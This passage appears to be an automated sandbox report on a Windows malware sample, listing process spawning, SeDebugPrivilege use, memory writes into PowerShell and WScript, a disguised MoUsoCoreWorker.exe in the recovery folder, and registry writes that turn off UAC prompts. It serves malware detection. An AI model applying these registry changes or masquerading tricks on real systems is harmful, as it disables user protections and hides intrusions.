N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1956 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 1956 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 224 wrote to memory of 952 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 224 wrote to memory of 952 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 224 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe
PID 224 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe
PID 4136 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 4136 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 4648 wrote to memory of 652 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 4648 wrote to memory of 652 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 4648 wrote to memory of 2628 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 4648 wrote to memory of 2628 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 652 wrote to memory of 3092 N/A C:\Windows\System32\WScript.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 652 wrote to memory of 3092 N/A C:\Windows\System32\WScript.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 3092 wrote to memory of 2528 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 3092 wrote to memory of 2528 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 3092 wrote to memory of 2044 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 3092 wrote to memory of 2044 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 2528 wrote to memory of 4132 N/A C:\Windows\System32\WScript.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 2528 wrote to memory of 4132 N/A C:\Windows\System32\WScript.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
